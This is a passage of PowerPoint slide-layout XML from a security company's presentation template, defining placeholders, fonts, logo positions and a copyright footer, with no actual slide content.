          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867027604"/>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14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867027604"/>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8_Title and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867027604"/>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14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="186702760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46F7C92-B666-BE4A-87BA-E45BF689715D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/17/2016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E9C67AB-B614-C742-93A2-1DCA2D6D2270}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39108094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0_Title and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
